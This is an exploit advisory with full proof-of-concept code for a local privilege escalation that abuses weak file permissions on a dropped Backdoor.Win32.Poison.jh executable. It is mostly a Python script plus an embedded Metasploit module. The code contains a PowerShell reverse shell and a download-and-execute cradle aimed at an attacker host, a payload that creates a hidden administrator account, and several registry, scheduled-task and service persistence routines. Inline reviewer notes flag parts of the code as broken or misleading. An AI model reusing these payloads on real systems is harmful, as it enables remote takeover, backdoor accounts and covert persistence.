=============================================================================================================================================
| # Title : Backdoor.Win32.Poison.jh – Insecure File Permissions Leading to Malware-on-Malware Local Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : n/a – third-party malware sample, not a vendor product. No standalone download available |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/213264/ & MVID-2025-0704
[+] Summary : This Python script demonstrates a Local Privilege Escalation (LPE) exploit targeting a vulnerability in the Backdoor.Win32.Poison.jh malware sample.
The exploit leverages insecure file permissions created by the malware itself, allowing any local user to replace the malicious executable with arbitrary code. Privilege escalation only follows if the malware's own (elevated) persistence later launches the replaced file; a user launching the file themselves runs it under their own token and gains nothing.
[+] Vulnerability Overview :
CWE-276: Incorrect Default Permissions
Malware: Backdoor.Win32.Poison.jh
Location: C:\Windows\SysWOW64\28463\YJBE.exe
Flaw: File has Everyone:(ID)F (Full Control) permissions
Impact: Any local user can modify/replace the malware executable
Type: Backdoor Trojan (Win32/Windows)
Purpose: Grants attackers unauthorized remote access and control over the infected system.
Behavior: Can execute commands, download/upload files, steal sensitive data, and connect to C2 (Command & Control) servers.
Discovery: Part of the Backdoor.Win32.Poison family, first identified around 2009. The .jh suffix refers to a specific variant or signature used by antivirus vendors.
Source: Developed by malware authors; not self-spreading, usually delivered via malicious downloads, infected executables, or phishing.
Relation to Poison Ivy: Not necessarily Poison Ivy itself, but shares similar RAT functionality.
Detection & Prevention: Detected by major AV solutions like Microsoft Defender, Trend Micro, and Kaspersky. Removal requires standard AV cleanup and disconnecting from networks.
Key Points: Unauthorized remote control, file manipulation, data theft, part of Poison family, Windows-targeted, identified in AV databases since ~2009.
[+] PoC : python poc.py (Windows only; the optional third-party `wmi` and `pywin32` packages enable the WMI trigger and the Startup-folder shortcut, otherwise those steps are silently skipped)
#!/usr/bin/env python3
import os
import sys
import shutil
import time
import subprocess
import ctypes
import winreg
from pathlib import Path
# ============================================
# PART 1: LOCAL PRIVILEGE ESCALATION EXPLOIT
# ============================================
class PoisonExploit:
    """Malware-on-malware LPE proof of concept for Backdoor.Win32.Poison.jh.

    The malware drops YJBE.exe into target_dir with an Everyone:F ACL (per the
    advisory header). This class overwrites that file with a caller-chosen
    payload and then tries several launch and persistence mechanisms.

    Reviewer notes that apply to the class as a whole:
      * Every payload type writes *script text* (PowerShell or batch) under
        an .exe name. A non-PE file will presumably not launch through any of
        the trigger methods -- TODO confirm in a lab. The Ruby module further
        down in this file writes a real PE instead.
      * The helpers that would run the file as SYSTEM (schtasks /ru SYSTEM,
        sc create, HKLM writes) all require an already-elevated token, so
        they cannot be the escalation step. The only genuine escalation path
        is the malware's own elevated launcher executing the replaced file,
        which this script does not control.
      * Sub-process results are never checked, so the "[+] ..." success
        messages are printed whether or not the command worked.
    For isolated lab use only.
    """

    def __init__(self, target_dir: str = "C:\\Windows\\SysWOW64\\28463") -> None:
        """Resolve the target, backup and staging paths.

        Args:
            target_dir: Directory the malware dropped YJBE.exe into.
        """
        self.target_dir = target_dir
        self.target_file = os.path.join(target_dir, "YJBE.exe")
        self.backup_file = self.target_file + ".backup"
        self.payload_file = self.target_file + ".payload"
        # Elevation state of *this* process; it says nothing about the
        # context the replaced file will eventually run in.
        self.is_admin = self.check_admin()

    def check_admin(self) -> bool:
        """Return True if the current process token is elevated.

        Wraps shell32.IsUserAnAdmin. The catch-all also covers non-Windows
        hosts, where ctypes.windll does not exist; any failure reads as
        "not admin".
        """
        try:
            return ctypes.windll.shell32.IsUserAnAdmin() != 0
        except:  # deliberate catch-all, see docstring
            return False

    def check_vulnerability(self) -> bool:
        """Probe for the weak-permission precondition.

        Returns:
            True when target_dir and YJBE.exe both exist and a scratch file
            can be created and removed inside target_dir; False otherwise
            (including on any unexpected error, which is printed).

        NOTE(review): the advisory describes a weak ACL on the *file*
        (Everyone:F). This probe tests write access to the *directory*,
        which is a separate ACL, so it can report "vulnerable" for a
        non-writable file or "not vulnerable" for a writable one.
        """
        print("[*] Checking for Poison.jh vulnerability...")
        # 1. The drop directory must exist.
        if not os.path.exists(self.target_dir):
            print(f"[-] Target directory not found: {self.target_dir}")
            return False
        # 2. The dropped executable must exist.
        if not os.path.exists(self.target_file):
            print(f"[-] Target file not found: {self.target_file}")
            return False
        # 3. Scratch write to test (directory) write permission.
        try:
            test_file = os.path.join(self.target_dir, "test_write.tmp")
            with open(test_file, 'w') as f:
                f.write("test")
            os.remove(test_file)
            print("[+] Vulnerable: Write access confirmed!")
            return True
        except PermissionError:
            print("[-] Not vulnerable: No write permission")
            return False
        except Exception as e:
            print(f"[-] Error checking vulnerability: {e}")
            return False

    def create_payload(self, payload_type: str = "reverse_shell") -> bool:
        """Write the chosen payload text to self.payload_file.

        Args:
            payload_type: "reverse_shell" (PowerShell TCP shell),
                "meterpreter" (PowerShell download cradle) or "add_user"
                (batch: local admin "hacker", with a Winlogon UserList value
                that presumably hides it from the logon UI). Any other value
                writes nothing.

        Returns:
            Always True -- also for an unknown payload_type, even though no
            file was written (replace_file then fails on the missing copy).

        NOTE(review): all three variants are plain text that the caller
        later installs under an .exe name; see the class docstring.
        "ATTACKER_IP" is a placeholder the operator must replace.
        """
        print(f"[*] Creating {payload_type} payload...")
        if payload_type == "reverse_shell":
            # PowerShell TCP reverse shell; each received line is run with iex.
            payload = '''$client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
};
$client.Close()'''
            with open(self.payload_file, 'w') as f:
                f.write(payload)
        elif payload_type == "meterpreter":
            # Download cradle for a Meterpreter PowerShell stager.
            payload = '''IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8080/meterpreter.ps1')'''
            with open(self.payload_file, 'w') as f:
                f.write(payload)
        elif payload_type == "add_user":
            # Batch: create a local administrator account and hide it.
            payload = '''net user hacker P@ssw0rd! /add
net localgroup administrators hacker /add
reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" /v hacker /t REG_DWORD /d 0 /f'''
            with open(self.payload_file, 'w') as f:
                f.write(payload)
        print(f"[+] Payload created: {self.payload_file}")
        return True

    def backup_original(self) -> bool:
        """Copy the original YJBE.exe to self.backup_file (metadata preserved).

        Returns:
            True on success, False on any error (printed). exploit()
            ignores this value, so a failed backup does not stop the
            overwrite that follows.
        """
        try:
            shutil.copy2(self.target_file, self.backup_file)
            print(f"[+] Backup created: {self.backup_file}")
            return True
        except Exception as e:
            print(f"[-] Failed to backup: {e}")
            return False

    def replace_file(self) -> bool:
        """Delete the target and copy the staged payload into its place.

        The original is removed *before* the copy; if the copy then fails
        (e.g. create_payload wrote nothing), the target is already gone and
        only the .backup copy -- if backup_original succeeded -- remains.
        No attempt is made to preserve the original's ACL. The staged
        .payload file is deleted afterwards.

        Returns:
            True on success, False on any error (printed).
        """
        try:
            # Remove the original first (requires delete rights on the file).
            os.remove(self.target_file)
            # Install the staged payload under the original name.
            shutil.copy2(self.payload_file, self.target_file)
            # Remove the staging copy.
            if os.path.exists(self.payload_file):
                os.remove(self.payload_file)
            print("[+] File successfully replaced!")
            return True
        except Exception as e:
            print(f"[-] Failed to replace file: {e}")
            return False

    def trigger_execution(self) -> bool:
        """Try each launch method in order; stop at the first that reports success.

        Order: WMI, Task Scheduler, service, RunOnce. Each helper reports
        success without checking the command's result, so in practice this
        returns after the first one that does not raise.

        Returns:
            True if some method returned True, else False.
        """
        print("[*] Attempting to trigger execution...")
        methods = [
            self.trigger_via_wmi,
            self.trigger_via_task_scheduler,
            self.trigger_via_service,
            self.trigger_via_registry
        ]
        for method in methods:
            if method():
                return True
        return False

    def trigger_via_wmi(self) -> bool:
        """Launch the target with Win32_Process.Create via the `wmi` package.

        Requires the third-party `wmi` module, which is not imported at file
        level; if it is missing, the ImportError is swallowed and False is
        returned. Nothing here impersonates another account, so the process
        is presumably created under the caller's own token -- i.e. this path
        launches the payload without any elevation.

        Returns:
            True if the WMI call returned, False on any exception.
        """
        try:
            import wmi
            c = wmi.WMI()
            process_id, return_value = c.Win32_Process.Create(
                CommandLine=self.target_file
            )
            # return_value is not inspected; a non-zero WMI status still
            # counts as success here.
            print(f"[+] Triggered via WMI (PID: {process_id})")
            return True
        except:  # swallows ImportError and any WMI failure
            return False

    def trigger_via_task_scheduler(self) -> bool:
        """Create, run and delete a one-shot task that runs the target as SYSTEM.

        `/ru SYSTEM` needs an elevated caller, so this only works when
        self.is_admin is already True -- it cannot be the escalation step.
        Results are captured but never checked, so "[+] Triggered ..." is
        printed even when schtasks refused the request.

        Returns:
            True unless subprocess.run itself raised.
        """
        try:
            task_name = "PoisonTrigger"
            cmd = f'schtasks /create /tn "{task_name}" /tr "{self.target_file}" /sc once /st 00:00 /ru SYSTEM /f'
            subprocess.run(cmd, shell=True, capture_output=True)
            cmd = f'schtasks /run /tn "{task_name}"'
            subprocess.run(cmd, shell=True, capture_output=True)
            cmd = f'schtasks /delete /tn "{task_name}" /f'
            subprocess.run(cmd, shell=True, capture_output=True)
            print("[+] Triggered via Task Scheduler")
            return True
        except:  # only reached if subprocess.run itself raised
            return False

    def trigger_via_service(self) -> bool:
        """Register the target as an auto-start service, start it, delete the service.

        `sc create` / `sc start` need an elevated caller. A plain executable
        that does not talk to the Service Control Manager will presumably
        fail to start as a service -- TODO confirm. Exit codes are ignored.

        Returns:
            True unless subprocess.run itself raised.
        """
        try:
            service_name = "PoisonSvc"
            # Register the service.
            cmd = f'sc create {service_name} binPath= "{self.target_file}" type= own start= auto'
            subprocess.run(cmd, shell=True, capture_output=True)
            # Start it.
            cmd = f'sc start {service_name}'
            subprocess.run(cmd, shell=True, capture_output=True)
            # Remove the registration again.
            cmd = f'sc delete {service_name}'
            subprocess.run(cmd, shell=True, capture_output=True)
            print("[+] Triggered via Service")
            return True
        except:  # only reached if subprocess.run itself raised
            return False

    def trigger_via_registry(self) -> bool:
        """Queue the target in HKLM RunOnce (fires at the next logon, not now).

        Writing under HKLM needs an elevated caller; the resulting
        PermissionError is swallowed and False returned. This is a deferred
        trigger, and a RunOnce entry runs in the logging-on user's context
        rather than as SYSTEM -- verify against the RunOnce documentation.

        Returns:
            True if the value was written, False on any exception.
        """
        try:
            # Add a RunOnce value pointing at the replaced file.
            key = winreg.HKEY_LOCAL_MACHINE
            subkey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"
            with winreg.OpenKey(key, subkey, 0, winreg.KEY_SET_VALUE) as reg_key:
                winreg.SetValueEx(reg_key, "PoisonExec", 0, winreg.REG_SZ, self.target_file)
            print("[+] Added to Registry RunOnce")
            return True
        except:  # typically PermissionError when not elevated
            return False

    def establish_persistence(self) -> bool:
        """Run every persistence helper; True if any reported success.

        Unlike trigger_execution this does not stop early: all four methods
        run. Each reports success without checking command results, so the
        return value mostly reflects "no exception was raised".
        """
        print("[*] Establishing persistence...")
        persistence_methods = [
            self.persistence_registry,
            self.persistence_scheduled_task,
            self.persistence_service,
            self.persistence_startup
        ]
        success = False
        for method in persistence_methods:
            if method():
                success = True
        return success

    def persistence_registry(self) -> bool:
        """Add Run/RunOnce values pointing at the target under HKCU and HKLM.

        Issued via `reg add` with shell=True. The HKCU write works for any
        user; the HKLM writes need elevation. Exit codes are ignored, so this
        returns True even if only the HKCU entry landed. None of these values
        are removed by cleanup().
        """
        try:
            # Run-key locations to populate.
            registry_paths = [
                ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Poison"),
                ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Poison"),
                ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", "Poison")
            ]
            for path, name in registry_paths:
                cmd = f'reg add "{path}" /v "{name}" /t REG_SZ /d "{self.target_file}" /f'
                subprocess.run(cmd, shell=True, capture_output=True)
            print("[+] Persistence: Registry entries added")
            return True
        except:  # only reached if subprocess.run itself raised
            return False

    def persistence_scheduled_task(self) -> bool:
        """Create an hourly SYSTEM task ("WindowsUpdatePoison") that runs the target.

        Needs an elevated caller (`/ru SYSTEM`); exit code ignored. The task
        is never deleted by cleanup().
        """
        try:
            task_name = "WindowsUpdatePoison"
            cmd = f'schtasks /create /tn "{task_name}" /tr "{self.target_file}" /sc hourly /mo 1 /ru SYSTEM /f'
            subprocess.run(cmd, shell=True, capture_output=True)
            print("[+] Persistence: Scheduled task created")
            return True
        except:  # only reached if subprocess.run itself raised
            return False

    def persistence_service(self) -> bool:
        """Register an auto-start service ("PoisonService") for the target.

        Needs an elevated caller; exit code ignored. The service is never
        deleted by cleanup().
        """
        try:
            service_name = "PoisonService"
            cmd = f'sc create {service_name} binPath= "{self.target_file}" type= own start= auto'
            subprocess.run(cmd, shell=True, capture_output=True)
            print("[+] Persistence: Service created")
            return True
        except:  # only reached if subprocess.run itself raised
            return False

    def persistence_startup(self) -> bool:
        """Drop Poison.lnk into the current user's Startup folder.

        Requires the third-party `pywin32` package (win32com), which is not
        imported at file level; if missing, the ImportError is swallowed and
        False returned. Runs in the user's own context at logon. The
        shortcut is never removed by cleanup().
        """
        try:
            startup_path = os.path.expandvars("%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup")
            shortcut_path = os.path.join(startup_path, "Poison.lnk")
            # Build the .lnk through WScript.Shell COM automation.
            from win32com.client import Dispatch
            shell = Dispatch('WScript.Shell')
            shortcut = shell.CreateShortCut(shortcut_path)
            shortcut.Targetpath = self.target_file
            shortcut.WorkingDirectory = os.path.dirname(self.target_file)
            shortcut.save()
            print("[+] Persistence: Startup shortcut created")
            return True
        except:  # swallows ImportError and any COM failure
            return False

    def cleanup(self) -> None:
        """Delete the .backup and .payload staging files only.

        This does *not* restore the original file, and it does not remove
        any of the tasks, services, registry values or shortcuts created by
        the trigger/persistence helpers. Deleting the backup also discards
        the only remaining copy of the original sample.
        """
        print("[*] Cleaning up...")
        # Remove the backup of the original.
        if os.path.exists(self.backup_file):
            os.remove(self.backup_file)
        # Remove the staging copy if replace_file left it behind.
        if os.path.exists(self.payload_file):
            os.remove(self.payload_file)
        print("[+] Cleanup completed")

    def exploit(self, payload_type: str = "reverse_shell") -> bool:
        """Run the full chain: probe, stage, back up, overwrite, trigger, persist.

        Args:
            payload_type: Forwarded to create_payload.

        Returns:
            False if the probe or the overwrite failed; otherwise True,
            regardless of whether any trigger or persistence step worked.

        Prompts on stdin at the end (optional cleanup). The final
        "Running as" line reflects this script's own token (check_admin),
        not the context the payload ran in.
        """
        print("=" * 70)
        print("POISON.JH LOCAL PRIVILEGE ESCALATION EXPLOIT")
        print("=" * 70)
        # 1. Precondition probe (directory write access; see check_vulnerability).
        if not self.check_vulnerability():
            return False
        # 2. Stage the payload text.
        self.create_payload(payload_type)
        # 3. Back up the original (return value ignored -- a failed backup
        #    does not stop the overwrite).
        self.backup_original()
        # 4. Overwrite the target.
        if not self.replace_file():
            return False
        # 5. Try to launch it.
        if self.trigger_execution():
            print("[+] Payload execution triggered!")
        else:
            print("[!] Could not auto-trigger. Manual execution required.")
            print(f"[!] File location: {self.target_file}")
        # 6. Persistence (all helpers attempted).
        if self.establish_persistence():
            print("[+] Persistence established!")
        # 7. Summary; "SYSTEM (admin)" here only means the caller was elevated.
        print("\n[+] Exploit completed successfully!")
        print(f"[+] Replaced: {self.target_file}")
        print(f"[+] Running as: {'SYSTEM (admin)' if self.is_admin else 'User'}")
        # 8. Optional cleanup of the staging files only.
        if input("\nCleanup? (y/n): ").lower() == 'y':
            self.cleanup()
        return True
# ============================================
# PART 2: METASPLOIT MODULE (REAL EXPLOIT)
# ============================================
# Ruby source of a Metasploit local-exploit module, kept as a string so that
# main() can print it and write it to poison_lpe_exploit.rb. It is never
# executed by this script. Unlike the Python payloads above, this module
# writes a real PE (generate_payload_exe) over the target, so the "file
# runs" step is at least plausible. Reviewer notes on the Ruby itself:
#   - check() probes write access to TARGET_PATH + ".test", i.e. the
#     directory, not the file's own ACL that the advisory describes.
#   - trigger_auto() returns after the first method call that does not
#     raise. cmd_exec does not raise on a failing command, so it reports
#     "Triggered via trigger_via_wmi" even when no process was created.
#     (wmic is deprecated on recent Windows builds -- verify on the target.)
#   - The service / task / RunOnce triggers (`sc create`, `/ru SYSTEM`,
#     HKLM writes) all need an already-elevated session, so they cannot be
#     the escalation step; escalation only occurs if the malware's own
#     elevated persistence launches the replaced file.
#   - PERSIST=true leaves Run values and an hourly SYSTEM task
#     ("WindowsPoison") behind; only the .backup file is registered for
#     cleanup.
#   - Escaping: inside this Python ''' literal, `\\"` becomes `\"` in the
#     emitted Ruby, which is what the Ruby double-quoted strings require.
METASPLOIT_MODULE = '''
##
# Poison.jh Local Privilege Escalation Exploit
# Real working exploit for the file permission vulnerability
##
require 'rex'
require 'msf/core/post/windows/priv'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Poison.jh Local File Permission Privilege Escalation',
'Description' => %q{
This module exploits insecure file permissions on Backdoor.Win32.Poison.jh malware.
The malware creates C:\\Windows\\SysWOW64\\28463\\YJBE.exe with Everyone:F permissions,
allowing any local user to replace the file and execute arbitrary code.
This is a REAL privilege escalation exploit when the following conditions are met:
1. Poison.jh malware is installed on the system
2. File has weak permissions (Everyone:Full Control)
3. File is executed (by malware itself or other means)
},
'License' => MSF_LICENSE,
'Author' => [
'indoushka'
],
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'SessionTypes' => ['meterpreter', 'shell'],
'Targets' => [
['Windows', {}]
],
'DefaultTarget' => 0,
'References' => [
['URL', 'https://malvuln.com/advisory/3d9821cbe836572410b3c5485a7f76ca.txt'],
['CWE', '276'] # Incorrect Default Permissions
],
'DisclosureDate' => '2025-12-23',
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
'WfsDelay' => 10
}
))
register_options([
OptString.new('TARGET_PATH', [
true,
'Path to vulnerable Poison.jh executable',
'C:\\\\Windows\\\\SysWOW64\\\\28463\\\\YJBE.exe'
]),
OptBool.new('KILL_PROCESS', [
true,
'Kill existing Poison.jh process',
true
]),
OptEnum.new('TRIGGER', [
true,
'Trigger method',
'auto',
['auto', 'wmi', 'service', 'task', 'registry', 'manual']
]),
OptBool.new('PERSIST', [
true,
'Establish persistence',
true
])
])
end
def check
vuln_path = datastore['TARGET_PATH']
print_status("Checking for Poison.jh vulnerability at: #{vuln_path}")
# Check if file exists
unless file_exist?(vuln_path)
return CheckCode::Safe("Target file not found")
end
# Try to write a test file
test_file = vuln_path + ".test"
begin
write_file(test_file, "test")
if file_exist?(test_file)
file_rm(test_file)
return CheckCode::Vulnerable("Write access confirmed - vulnerable!")
end
rescue
return CheckCode::Safe("No write access")
end
CheckCode::Unknown
end
def exploit
vuln_path = datastore['TARGET_PATH']
# Check if vulnerable
print_status("Running check...")
case check
when CheckCode::Vulnerable
print_good("Target is vulnerable!")
else
fail_with(Failure::NotVulnerable, "Target is not vulnerable")
end
# Kill existing process if requested
if datastore['KILL_PROCESS']
print_status("Killing Poison.jh process...")
session.sys.process.get_processes.each do |p|
if p['name'] =~ /YJBE/i || p['path'] =~ /28463/
print_status("Killing PID #{p['pid']} (#{p['name']})")
session.sys.process.kill(p['pid'])
end
end
Rex.sleep(2)
end
# Backup original file
backup_path = vuln_path + ".backup"
if file_exist?(vuln_path)
print_status("Backing up original file...")
session.fs.file.copy(vuln_path, backup_path)
register_file_for_cleanup(backup_path)
end
# Generate payload
print_status("Generating payload...")
payload_exe = generate_payload_exe
# Replace vulnerable file with payload
print_status("Replacing #{vuln_path} with payload...")
write_file(vuln_path, payload_exe)
print_good("File successfully replaced!")
# Trigger execution
trigger_method = datastore['TRIGGER']
print_status("Triggering payload execution via #{trigger_method}...")
case trigger_method
when 'wmi'
trigger_via_wmi(vuln_path)
when 'service'
trigger_via_service(vuln_path)
when 'task'
trigger_via_task(vuln_path)
when 'registry'
trigger_via_registry(vuln_path)
when 'auto'
trigger_auto(vuln_path)
end
# Establish persistence if requested
if datastore['PERSIST']
print_status("Establishing persistence...")
establish_persistence(vuln_path)
end
# Wait for session
print_status("Waiting for payload execution...")
Rex.sleep(datastore['WfsDelay'])
end
def trigger_via_wmi(path)
wmi_cmd = "wmic process call create \\"#{path}\\""
cmd_exec(wmi_cmd)
end
def trigger_via_service(path)
service_name = "PoisonSvc"
cmd_exec("sc create #{service_name} binPath= \\"#{path}\\" type= own start= auto")
cmd_exec("sc start #{service_name}")
cmd_exec("sc delete #{service_name}")
end
def trigger_via_task(path)
task_name = "PoisonTask"
cmd_exec("schtasks /create /tn \\"#{task_name}\\" /tr \\"#{path}\\" /sc once /st 00:00 /ru SYSTEM /f")
cmd_exec("schtasks /run /tn \\"#{task_name}\\"")
cmd_exec("schtasks /delete /tn \\"#{task_name}\\" /f")
end
def trigger_via_registry(path)
reg_cmd = "reg add \\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\" /v \\"Poison\\" /t REG_SZ /d \\"#{path}\\" /f"
cmd_exec(reg_cmd)
end
def trigger_auto(path)
# Try all methods
[method(:trigger_via_wmi),
method(:trigger_via_service),
method(:trigger_via_task),
method(:trigger_via_registry)].each do |method|
begin
method.call(path)
print_good("Triggered via #{method.name}")
return true
rescue
next
end
end
false
end
def establish_persistence(path)
# Add to registry
reg_keys = [
"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run",
"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"
]
reg_keys.each do |reg|
cmd_exec("reg add \\"#{reg}\\" /v \\"Poison\\" /t REG_SZ /d \\"#{path}\\" /f")
end
# Create scheduled task
task_name = "WindowsPoison"
cmd_exec("schtasks /create /tn \\"#{task_name}\\" /tr \\"#{path}\\" /sc hourly /mo 1 /ru SYSTEM /f")
end
end
'''
# ============================================
# PART 3: MAIN EXECUTION
# ============================================
def main() -> None:
    """Interactive entry point: pick a payload, run the chain, dump the MSF module.

    NOTE(review): option 4 ("Custom Command") is broken as written.
    `exploit.create_payload = lambda: custom_cmd` replaces the bound method
    with a zero-argument lambda, and PoisonExploit.exploit() then calls
    `self.create_payload(payload_type)` with one argument, which raises an
    uncaught TypeError before anything is written. Even with matching
    arity the lambda would only return the string and write no payload
    file, so replace_file() would fail on the missing copy.

    On success the Metasploit module text is printed and written to
    poison_lpe_exploit.rb in the current working directory.
    """
    print("""
╔══════════════════════════════════════════════════════════╗
║ Poison.jh LPE Exploit - Local Privilege Escalation ║
║ Conditions: Poison.jh with Everyone:F permissions ║
║ by indoushka ║
╚══════════════════════════════════════════════════════════╝
""")
    exploit = PoisonExploit()
    # Menu: key -> (label, payload_type forwarded to PoisonExploit.exploit).
    payloads = {
        "1": ("Reverse Shell", "reverse_shell"),
        "2": ("Meterpreter", "meterpreter"),
        "3": ("Add Admin User", "add_user"),
        "4": ("Custom Command", "custom")
    }
    print("\nSelect payload type:")
    for key, (name, _) in payloads.items():
        print(f" {key}. {name}")
    choice = input("\nChoice: ")
    if choice in payloads:
        payload_name, payload_type = payloads[choice]
        print(f"\n[*] Selected: {payload_name}")
        if payload_type == "custom":
            custom_cmd = input("Enter custom command: ")
            # BUG: zero-arg lambda, but exploit() calls create_payload(payload_type).
            exploit.create_payload = lambda: custom_cmd
        # Run the full chain.
        if exploit.exploit(payload_type):
            print("\n" + "="*70)
            print("EXPLOIT SUCCESSFUL!")
            print("="*70)
            # Show the bundled Metasploit module source.
            print("\n" + "="*70)
            print("METASPLOIT MODULE CODE")
            print("="*70)
            print(METASPLOIT_MODULE)
            # Persist it next to wherever the script was run from.
            with open("poison_lpe_exploit.rb", "w") as f:
                f.write(METASPLOIT_MODULE)
            print("\n[+] Metasploit module saved to: poison_lpe_exploit.rb")
        else:
            print("\n[-] Exploit failed!")
    else:
        print("[-] Invalid choice!")
# Script entry point; nothing runs on import.
if __name__ == "__main__":
    main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================